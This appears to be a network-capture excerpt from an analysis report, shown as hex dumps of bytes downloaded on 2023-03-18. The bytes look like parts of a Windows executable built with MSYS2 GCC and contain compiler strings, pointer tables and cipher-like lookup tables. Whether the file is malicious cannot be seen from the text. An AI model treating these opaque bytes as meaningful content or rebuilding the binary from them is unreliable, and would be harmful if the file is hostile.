                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7345INData Raw: 33 d2 b1 77 e3 99 2b 66 56 5f 21 00 00 24 00 01 00 c1 30 80 f0 36 86 00 00 ce 79 0a 01 c4 a5 e7 21 aa f9 eb 24 bc fc f6 c4 00 c6 00 00 d7 73 01 00 90 e7 00 3e fb eb 00 00 66 72 98 13 1e 03 c3 07 49 36 b6 ab da 42 98 d1 05 eb 00 00 ba 81 01 00 96 dc 00 f2 04 e0 00 00 3d ec 08 29 6d f8 5b 1d 5e b1 c6 86 e6 1a 0c 73 67 48 00 00 5d 3e 01 00 a4 ae 00 3b 70 d7 00 00 c5 dc 65 28 67 15 67 0f 26 f9 5a 41 c3 cd 9c e1 38 af 00 00 ae 4d 01 00 f5 79 80 f5 bd ba 00 00 6d d7 f7 3a bd b3 43 29 c5 36 07 ce a5 73 f2 f4 3d 82 00 00 49 f2 01 00 c7 0b 80 3c c9 8d 00 00 95 e7 9a 3b b7 5e 7f 3b bd 7e 9b 09 80 a4 62 66 62 65 00 00 30 cc 01 00 a2 95 00 f7 8f dc 00 00 9e 42 f5 12 14 ee ff 15 31 7e 2a 6c ff 95 08 43 5a 0c 00 00 4f c5 01 00 27 e7 00 31 64 a2 00 00 0b 8f cd 6d 7d 83
                                                                                                                                                                                                                    Data Ascii: 3w+fV_!$06y!$s>frI6B=)m[^sgH]>;pe(gg&ZA8Mym:C)6s=I<;^;~bfbe0B1~*lCZO'1dm}
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7361INData Raw: f5 ac af b0 56 8a 44 64 a4 ec 02 00 00 42 de d4 00 de e8 00 00 4b 14 00 00 7f 6c d7 07 2e 11 db 2e 81 8d e9 81 6b 2a 0e 67 de f8 00 00 9f d5 ea 00 d5 9d 00 e0 8a ea 00 00 57 ea 8c 28 30 c9 28 3d 24 e1 f4 1f 57 97 dd 7e f1 14 00 00 f5 ee d4 00 0e 0d 00 60 bf e0 00 00 bb 2e bd 3a 96 72 bb ba 3b f5 03 20 c4 0b 3a 7f 7b 48 00 00 51 63 e8 00 3c 47 00 60 e4 ff 00 00 c5 30 e8 72 ed 3f a2 61 16 d7 5a f7 25 65 50 bc 49 b2 00 00 8c 68 d6 00 37 32 00 80 25 01 00 00 ed b6 b3 5d f3 e7 51 72 b3 bb 47 69 19 d8 83 a5 66 5e 00 00 28 e5 ea 00 05 78 00 80 7e 1e 00 00 93 a8 e6 15 88 aa 48 a9 9e 99 1e be f8 b6 e9 66 54 a4 00 00 3b 58 d6 00 e7 d7 00 e0 d1 f5 00 00 29 f4 d9 60 4b 84 31 e6 09 c3 ad c8 b6 f9 b7 bd c3 ee 00 00 bc a4 c0 00 68 bb 00 00 09 a9 00 00 f9 9c 94 6a 27 9c
                                                                                                                                                                                                                    Data Ascii: VDdBKl..k*gW(0(=$W~`.:r; :{HQc<G`0r?aZ%ePIh72%]QrGif^(x~HfT;X)`K1hj'
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7377INData Raw: 3e e4 95 83 4f 8b 44 f5 72 8f 0a 03 00 50 b8 00 e1 ea da 00 00 1e 72 00 00 ae df 72 19 3d 52 bc 4d de 60 88 a4 6b ca 6b a3 a9 6b 02 00 ae 76 00 bc 21 54 00 00 45 93 00 00 b7 1c d6 6b 6d e3 0c 1b 66 80 f8 04 28 d1 65 72 c4 be 03 00 72 46 00 e4 b2 7d 00 00 cf 57 00 00 ce 28 a8 61 0c db dc b5 0a 7f 9d 07 bb 84 f4 5c 8a ca 02 00 fe 84 00 b6 9c ba 00 00 ed f4 00 00 3d b7 16 23 f6 59 78 c6 30 8a 96 ec 5b 0a 6a 8d ac ab 03 00 00 4a 00 eb 57 34 00 00 b6 15 00 00 24 74 b2 51 a6 e8 c8 90 88 6a e6 4c 18 11 64 5c c1 7e 02 00 8c 88 00 b9 79 f3 00 00 94 b6 00 00 d7 eb 0c 13 5c 6a 6c e3 b2 9f ed a7 f8 9f fa 8d e7 1f 03 00 22 b4 00 ee 0f 93 00 00 67 30 00 00 44 83 68 29 97 61 a8 68 5c 75 f3 ef c8 5f fb a3 e2 df 02 00 f9 87 00 a2 00 ae 00 00 cc 1f 00 00 a4 8e 4c 2e 8a ec
                                                                                                                                                                                                                    Data Ascii: >ODrPrr=RM`kkkv!TEkmf(errF}W(a\=#Yx0[jJW4$tQjLd\~y\jl"g0Dh)ah\u_L.
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7393INData Raw: b9 c3 56 a7 a6 2e b8 4c bc 49 49 80 01 a9 4b 00 c0 e0 e1 00 00 c6 42 00 00 1f aa d1 57 f1 87 0a 8f 1e 3a 02 ee 0d dd 5a a5 f9 59 bc 01 6d de 00 00 03 0d 00 00 df 42 00 00 28 34 7e 56 dd 8e 4e 6c 7b 5c be 2d eb 75 7d 06 dc 9e 81 01 d6 ed 00 40 d7 90 00 00 3a 5b 00 00 c4 3c 2c 3a 7a bd f9 21 d4 d1 8d a9 60 f1 d2 c9 77 f5 b8 01 92 8e 00 40 77 48 00 00 24 7f 00 00 ce 2d 78 00 61 95 13 17 09 bd 28 e1 43 94 c4 d0 c7 e5 84 01 56 1b 00 80 94 a4 00 00 3d 7f 00 00 f9 b3 d7 01 4d 9c 57 f4 6c db 94 22 a5 3c e3 73 e2 22 bd 01 12 78 00 80 34 7c 00 00 23 5b 00 00 f3 a2 83 3b 56 b4 bd c2 b1 b7 31 6a 86 59 f5 6a 52 32 85 01 29 bd 00 00 a3 d5 00 00 c1 66 00 00 22 25 2a 6c c6 a6 a4 5a a6 30 1b 65 c8 10 6b 1f 6c 8e b0 01 f2 0b 00 c0 b4 7b 00 00 a1 00 00 00 ae f5 56 36 31 51
                                                                                                                                                                                                                    Data Ascii: V.LIIKBW:ZYmB(4~VNl{\-u}@:[<,:z!`w@wH$-xa(CV=MWl"<s"x4|#[;V1jYjR2)f"%*lZ0ekl{V61Q
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7409INData Raw: 30 25 d7 51 99 75 bd 48 48 7e fe 00 d4 0b 5e 00 00 b3 46 00 00 5a c3 00 00 43 98 9a 0d b1 ce ed 56 c1 3a fb 09 94 9a 59 4f 32 04 70 ea eb 5c 00 00 af b5 00 00 18 44 00 00 50 ac 92 12 ba db 42 85 20 93 00 93 61 db 42 15 31 6c 30 d4 60 97 00 00 96 a1 00 00 de ec 00 00 0c be 63 56 d8 c6 da a7 3d 57 7f 60 0b ca 31 e0 5b 9a 30 e8 8b 7a 00 00 77 68 00 00 32 36 00 00 56 e3 6d 75 dc 48 8c c1 d9 ba d5 f0 ea ed 20 e7 17 60 40 d6 6b 78 00 00 6b 9b 00 00 70 b1 00 00 45 d7 65 6a d7 5d 23 12 38 13 2e 6a 1f ac 3b bd 14 08 40 ea 80 95 00 00 8a 52 00 00 9c 6b 00 00 1f 8a 6b 49 d3 d3 75 74 dc fe 84 fa fe 8b 2a ba 58 f2 70 d6 00 b1 00 00 4e 7c 00 00 f4 9e 00 00 0a f1 9c 31 be 55 14 e3 c4 7e aa 03 80 fc 53 12 7d 96 00 c0 dd 84 00 00 02 fe 00 00 56 8c 00 00 0d cf 9d 37 19 fd
                                                                                                                                                                                                                    Data Ascii: 0%QuHH~^FZCV:YO2p\DPB aB1l0`cV=W`1[0zwh26VmuH `@kxkpEej]#8.j;@RkkIut*XpN|1U~S}V7
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7425INData Raw: 86 c4 96 f7 e6 9a 29 45 8d 30 23 90 00 f1 17 da ae 3c 26 12 ee 98 cb ca f3 d9 24 e0 00 44 be cb e0 19 f2 0b e0 4e 15 f9 1d c4 92 80 00 94 68 a8 ba 12 02 ec ce ab 0b 17 33 7a e4 f0 00 18 ef 30 92 ea b2 09 c6 a9 e9 98 4d 93 e3 90 00 c8 39 53 c8 e1 42 ee e8 4c f7 76 63 2d 95 f0 00 21 c1 b9 f4 37 d6 f5 c0 7d d5 24 dd 67 52 a0 00 15 e4 d7 39 28 e7 14 84 b1 ce 6b 03 21 b7 e0 00 0f cc 50 4b 7e 5f 0e eb 33 50 3d ac d9 40 b0 00 49 b5 2c 4b db a7 16 a2 56 32 0a 53 76 c6 e0 00 36 e2 d9 2d a3 3b f2 ed e7 6c 81 3c 2d f1 a0 00 2c ca 5e 5f f5 83 e8 82 65 f2 d7 93 d5 06 f0 00 6a b3 22 5f 50 7b f0 cb 00 90 e0 6c 7a 80 b0 00 70 9b a5 2d 06 c3 ea a4 82 0e b6 c3 82 77 f0 00 53 9d ab 39 8d 1f 0c cd d4 ac 5c fc 8e 31 c0 00 11 57 4d fd 2e 94 41 ae b3 78 d6 b8 04 15 c0 00 1c 16
                                                                                                                                                                                                                    Data Ascii: )E0#<&$DNh3z0M9SBLvc-!7}$gR9(k!PK~_3P=@I,KV2Sv6-;l<-,^_ej"_P{lzp-wS9\1WM.Ax
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7441INData Raw: 72 2a 01 1b a1 c7 da 76 c9 9e 6b 00 90 b6 e5 80 f2 0b 28 1c 30 c6 ac 70 3f 99 f5 00 e0 e4 a5 4a 45 0d 91 1c 55 1b 61 17 66 6a bb 00 80 8a 5a 97 83 07 e2 30 d9 e7 9f 83 12 8b 3b 00 f0 71 d1 34 03 26 cb 37 48 e6 e9 85 e4 8c a5 00 90 1f 2e e9 c5 2c b8 1b c4 1a 17 11 90 6d 25 00 f0 d8 1a 5d 34 01 5b 30 bc 3a 52 e4 4b 78 75 00 a0 09 78 02 38 77 c6 60 17 c1 35 c6 b8 b6 d6 00 e0 1e f9 f0 1c 65 21 14 49 7e ad b7 97 72 ca 00 b0 9c 0c 7c 7e 5c 9c 4b 0a 3c bd 54 3a 50 c8 00 e0 b7 32 99 2b 42 b1 13 bd a2 16 d6 38 86 1a 00 a0 a0 b3 6b 0f 50 56 67 e3 1d 8e a7 17 42 06 00 f0 22 46 e7 6d 69 eb 38 a0 5f 9e 44 ba 60 04 00 b0 35 c7 15 49 7b 0c 4c fe e0 06 35 95 a4 18 00 f0 8b 8d 8e 5a 4e 7b 3f 54 83 25 25 15 94 d4 00 c0 6b 14 c5 03 78 09 93 0a 78 de 51 2f a5 84 00 c0 63 f6
                                                                                                                                                                                                                    Data Ascii: r*vk(0p?JEUafjZ0;q4&7H.,m%]4[0:RKxux8w`5e!I~r|~\K<T:P2+B8kPVgB"Fmi8_D`5I{L5ZN{?T%%kxxQ/c
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7457INData Raw: 6b bd 6b ab 5c d9 ab 85 85 92 85 73 81 3c 73 bd bd da bd 34 d2 8f 34 5d 5d e7 5d 50 80 90 50 10 10 30 10 03 f3 07 03 f4 f4 01 f4 c0 16 dd c0 cb cb 40 cb c6 ed d3 c6 3e 3e 42 3e 11 28 2d 11 05 05 0f 05 e6 1f 78 e6 67 67 a9 67 53 73 97 53 e4 e4 31 e4 bb 25 02 bb 27 27 69 27 58 32 73 58 41 41 c3 41 9d 2c a7 9d 8b 8b 80 8b 01 51 f6 01 a7 a7 f4 a7 94 cf b2 94 7d 7d 87 7d fb dc 49 fb 95 95 a2 95 9f 8e 56 9f d8 d8 75 d8 30 8b 70 30 fb fb 10 fb 71 23 cd 71 ee ee 2f ee 91 c7 bb 91 7c 7c 84 7c e3 17 71 e3 66 66 aa 66 8e a6 7b 8e dd dd 7a dd 4b b8 af 4b 17 17 39 17 46 02 45 46 47 47 c9 47 dc 84 1a dc 9e 9e bf 9e c5 1e d4 c5 ca ca 43 ca 99 75 58 99 2d 2d 77 2d 79 91 2e 79 bf bf dc bf 1b 38 3f 1b 07 07 09 07 23 01 ac 23 ad ad ea ad 2f ea b0 2f 5a 5a ee 5a b5 6c ef b5
                                                                                                                                                                                                                    Data Ascii: kk\s<s44]]]PP0@>>B>(-xgggSsS1%''i'X2sXAAA,Q}}}IVu0p0q#q/|||qfff{zKK9FEFGGGCuX--w-y.y8?##//ZZZl
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7473INData Raw: 41 c3 41 ba 74 f4 ba 80 80 9d 80 db 2e e2 db cc cc 49 cc a4 44 c2 a4 86 86 97 86 45 f1 42 45 b3 b3 c8 b3 78 c0 d8 78 18 18 28 18 96 6d 43 96 2e 2e 72 2e 16 82 d5 16 57 57 f9 57 1e 30 36 1e 06 06 0a 06 f7 37 55 f7 62 62 a6 62 03 f3 07 03 f4 f4 01 f4 ee ad 9b ee 36 36 5a 36 b2 c6 17 b2 d1 d1 6e d1 da 7f 14 da 6b 6b bd 6b 77 d8 c3 77 1b 1b 2d 1b ec 0f 6a ec 65 65 af 65 bc 8f fa bc 75 75 9f 75 50 80 90 50 10 10 30 10 95 9e 44 95 da da 73 da 70 72 3b 70 49 49 db 49 be 2d 0b be 26 26 6a 26 3a 9b 62 3a f9 f9 16 f9 c0 16 dd c0 cb cb 40 cb e3 17 71 e3 66 66 aa 66 5c 6b 8c 5c e7 e7 34 e7 68 b9 03 68 ba ba d3 ba 2c 19 b7 2c ae ae ef ae 0d ba ea 0d 50 50 f0 50 07 aa f8 07 52 52 f6 52 3d 31 9a 3d ab ab e0 ab 11 28 2d 11 05 05 0f 05 17 d3 23 17 f0 f0 0d f0 39 68 65 39
                                                                                                                                                                                                                    Data Ascii: AAt.IDEBExx(mC..r.WWW067Ubbb66Z6nkkkww-jeeeuuuPP0Dspr;pIII-&&j&:b:@qfff\k\4hh,,PPPRRR=1=(-#9he9
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7489INData Raw: 7b f1 7b b5 e1 6a 80 35 35 d4 35 e8 69 3a f5 1d 1d 74 1d 53 47 dd b3 e0 e0 a7 e0 f6 ac b3 21 d7 d7 7b d7 5e ed 99 9c c2 c2 2f c2 6d 96 5c 43 2e 2e b8 2e 62 7a 96 29 4b 4b 31 4b a3 21 e1 5d fe fe df fe 82 16 ae d5 57 57 41 57 a8 41 2a bd 15 15 54 15 9f b6 ee e8 77 77 c1 77 a5 eb 6e 92 37 37 dc 37 7b 56 d7 9e e5 e5 b3 e5 8c d9 23 13 9f 9f 46 9f d3 17 fd 23 f0 f0 e7 f0 6a 7f 94 20 4a 4a 35 4a 9e 95 a9 44 da da 4f da fa 25 b0 a2 58 58 7d 58 06 ca 8f cf c9 c9 03 c9 55 8d 52 7c 29 29 a4 29 50 22 14 5a 0a 0a 28 0a e1 4f 7f 50 b1 b1 fe b1 69 1a 5d c9 a0 a0 ba a0 7f da d6 14 6b 6b b1 6b 5c ab 17 d9 85 85 2e 85 81 73 67 3c bd bd ce bd d2 34 ba 8f 5d 5d 69 5d 80 50 20 90 10 10 40 10 f3 03 f5 07 f4 f4 f7 f4 16 c0 8b dd cb cb 0b cb ed c6 7c d3 3e 3e f8 3e 28 11 0a 2d
                                                                                                                                                                                                                    Data Ascii: {{j555i:tSG!{^/m\C...bz)KK1K!]WWAWA*Twwwn777{V#F#j JJ5JDO%XX}XUR|)))P"Z(OPi]kkk\.sg<4]]i]P @|>>>(-
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7505INData Raw: 75 62 73 74 72 00 00 00 00 00 00 67 65 6e 65 72 69 63 00 73 79 73 74 65 6d 00 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 5f 4d 5f 63 6f 6e 73 74 72 75 63 74 20 6e 75 6c 6c 20 6e 6f 74 20 76 61 6c 69 64 00 00 00 00 00 00 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 5f 53 5f 63 6f 6e 73 74 72 75 63 74 20 6e 75 6c 6c 20 6e 6f 74 20 76 61 6c 69 64 00 43 00 50 4f 53 49 58 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 65 72 61 73 65 00 00 00 25 73 3a 20 5f 5f 70 6f 73 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 20 3e 20 74 68 69 73 2d 3e 73 69 7a 65 28 29 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 00 00 68 c4 e2 ff 40 c4 e2 ff 20 c4 e2 ff 00 c4 e2 ff 78 c4 e2 ff 84 bd e2 ff 5c bd e2 ff 3c bd e2 ff 1c bd e2 ff 94 bd e2 ff 25 2e 2a 4c 66 00 25 6d 2f 25 64 2f
                                                                                                                                                                                                                    Data Ascii: ubstrgenericsystembasic_string::_M_construct null not validbasic_string::_S_construct null not validCPOSIXbasic_string::erase%s: __pos (which is %zu) > this->size() (which is %zu)h@ x\<%.*Lf%m/%d/
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7521INData Raw: 00 00 00 00 00 00 00 00 00 00 00 60 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 20 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 58 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 98 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 48 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 68 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 60 40 01 00 00 00 00 00 00 00 00 00 00 00 60 f5 7d 40 01 00 00 00 00 00 00 00 00 00 00 00 68 0d 60 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 d0 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 c8 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 c0 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 b8 b3 5f 40 01 00 00 00 00 00 00 00 00 00 00 00 10 36 7e 40 01 00 00 00 00 00 00 00 00 00 00 00 11 36 7e 40
                                                                                                                                                                                                                    Data Ascii: `_@ _@X_@_@H_@h_@P`@`}@h`@_@_@_@_@_@6~@6~@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7537INData Raw: 00 00 00 80 8b 75 40 01 00 00 00 f0 ab 75 40 01 00 00 00 a0 8b 75 40 01 00 00 00 00 00 00 00 02 00 00 00 e0 67 75 40 01 00 00 00 02 00 00 00 00 00 00 00 90 6e 75 40 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ab 75 40 01 00 00 00 c0 8b 75 40 01 00 00 00 00 00 00 00 02 00 00 00 e0 67 75 40 01 00 00 00 02 00 00 00 00 00 00 00 90 6e 75 40 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ab 75 40 01 00 00 00 e0 8b 75 40 01 00 00 00 00 00 00 00 02 00 00 00 e0 67 75 40 01 00 00 00 02 00 00 00 00 00 00 00 90 6e 75 40 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ab 75 40 01 00 00 00 00 8c 75 40 01 00 00 00 00 00 00 00 02 00 00 00 e0 67 75 40 01 00 00 00 02 00 00 00 00 00 00 00 90 6e 75 40 01 00 00 00 02 00 00 00
                                                                                                                                                                                                                    Data Ascii: u@u@u@gu@nu@u@u@gu@nu@u@u@gu@nu@u@u@gu@nu@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7553INData Raw: 00 00 00 a0 55 75 40 01 00 00 00 a8 f6 75 40 01 00 00 00 80 f6 75 40 01 00 00 00 d8 f6 75 40 01 00 00 00 e8 56 75 40 01 00 00 00 98 56 75 40 01 00 00 00 c0 56 75 40 01 00 00 00 68 57 75 40 01 00 00 00 90 57 75 40 01 00 00 00 38 57 75 40 01 00 00 00 10 57 75 40 01 00 00 00 28 f7 75 40 01 00 00 00 00 f7 75 40 01 00 00 00 58 f7 75 40 01 00 00 00 b8 57 75 40 01 00 00 00 e0 57 75 40 01 00 00 00 80 f7 75 40 01 00 00 00 a8 f7 75 40 01 00 00 00 08 58 75 40 01 00 00 00 30 58 75 40 01 00 00 00 d0 f7 75 40 01 00 00 00 f8 f7 75 40 01 00 00 00 58 58 75 40 01 00 00 00 80 58 75 40 01 00 00 00 20 f8 75 40 01 00 00 00 48 f8 75 40 01 00 00 00 a8 58 75 40 01 00 00 00 d0 58 75 40 01 00 00 00 70 f8 75 40 01 00 00 00 18 fc 75 40 01 00 00 00 f8 58 75 40 01 00 00 00 20 59 75 40
                                                                                                                                                                                                                    Data Ascii: Uu@u@u@u@Vu@Vu@Vu@hWu@Wu@8Wu@Wu@(u@u@Xu@Wu@Wu@u@u@Xu@0Xu@u@u@XXu@Xu@ u@Hu@Xu@Xu@pu@u@Xu@ Yu@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7569INData Raw: 00 00 00 40 58 53 40 01 00 00 00 60 86 54 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 63 75 40 01 00 00 00 e0 db 58 40 01 00 00 00 40 db 58 40 01 00 00 00 00 5f 53 40 01 00 00 00 50 5d 53 40 01 00 00 00 00 00 00 00 00 00 00 00 00 64 75 40 01 00 00 00 30 dc 58 40 01 00 00 00 90 db 58 40 01 00 00 00 f0 5f 53 40 01 00 00 00 e0 5a 53 40 01 00 00 00 00 00 00 00 00 00 00 00 40 64 75 40 01 00 00 00 20 dd 58 40 01 00 00 00 80 dc 58 40 01 00 00 00 f0 64 53 40 01 00 00 00 40 63 53 40 01 00 00 00 00 00 00 00 00 00 00 00 80 64 75 40 01 00 00 00 70 dd 58 40 01 00 00 00 d0 dc 58 40 01 00 00 00 e0 65 53 40 01 00 00 00 e0 60 53 40 01 00 00 00 00 00 00 00 00 00 00 00 c0 64 75 40 01 00 00 00 60 de 58 40 01 00 00 00 c0 dd 58 40 01 00 00 00 f0 69 53 40
                                                                                                                                                                                                                    Data Ascii: @XS@`T@cu@X@@X@_S@P]S@du@0X@X@_S@ZS@@du@ X@X@dS@@cS@du@pX@X@eS@`S@du@`X@X@iS@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7585INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00 00 00 08 00 00 00 0c 00 00 00 00 00 00 00 0a 00 00 00 0d 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 75 75 75 75 75 75 75 75 62 74 6e 75 66 72 75 75 75 75 75 75
                                                                                                                                                                                                                    Data Ascii: "/\uuuuuuuubtnufruuuuuu
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7601INData Raw: 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29
                                                                                                                                                                                                                    Data Ascii: MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project)
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7617INData Raw: 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a
                                                                                                                                                                                                                    Data Ascii: 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7633INData Raw: 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62 79 20 4d 53 59 53 32 20 70 72 6f 6a 65 63 74 29 20 31 31 2e 32 2e 30 00 00 00 00 00 47 43 43 3a 20 28 52 65 76 31 30 2c 20 42 75 69 6c 74 20 62
                                                                                                                                                                                                                    Data Ascii: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built by MSYS2 project) 11.2.0GCC: (Rev10, Built b
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7649INData Raw: c6 05 00 47 c6 05 00 f0 6f 7a 00 50 c6 05 00 58 c6 05 00 f4 6f 7a 00 60 c6 05 00 68 c6 05 00 f8 6f 7a 00 70 c6 05 00 78 c6 05 00 fc 6f 7a 00 80 c6 05 00 87 c6 05 00 00 70 7a 00 90 c6 05 00 98 c6 05 00 04 70 7a 00 a0 c6 05 00 a7 c6 05 00 08 70 7a 00 b0 c6 05 00 b7 c6 05 00 0c 70 7a 00 c0 c6 05 00 c7 c6 05 00 10 70 7a 00 d0 c6 05 00 dc c6 05 00 14 70 7a 00 e0 c6 05 00 35 c7 05 00 18 70 7a 00 40 c7 05 00 48 c7 05 00 1c 70 7a 00 50 c7 05 00 59 c7 05 00 20 70 7a 00 60 c7 05 00 68 c7 05 00 24 70 7a 00 70 c7 05 00 77 c7 05 00 28 70 7a 00 80 c7 05 00 88 c7 05 00 2c 70 7a 00 90 c7 05 00 95 c7 05 00 30 70 7a 00 a0 c7 05 00 a7 c7 05 00 34 70 7a 00 b0 c7 05 00 b7 c7 05 00 38 70 7a 00 c0 c7 05 00 c9 c7 05 00 3c 70 7a 00 d0 c7 05 00 20 c8 05 00 40 70 7a 00 20 c8 05 00
                                                                                                                                                                                                                    Data Ascii: GozPXoz`hozpxozpzpzpzpzpzpz5pz@HpzPY pz`h$pzpw(pz,pz0pz4pz8pz<pz @pz
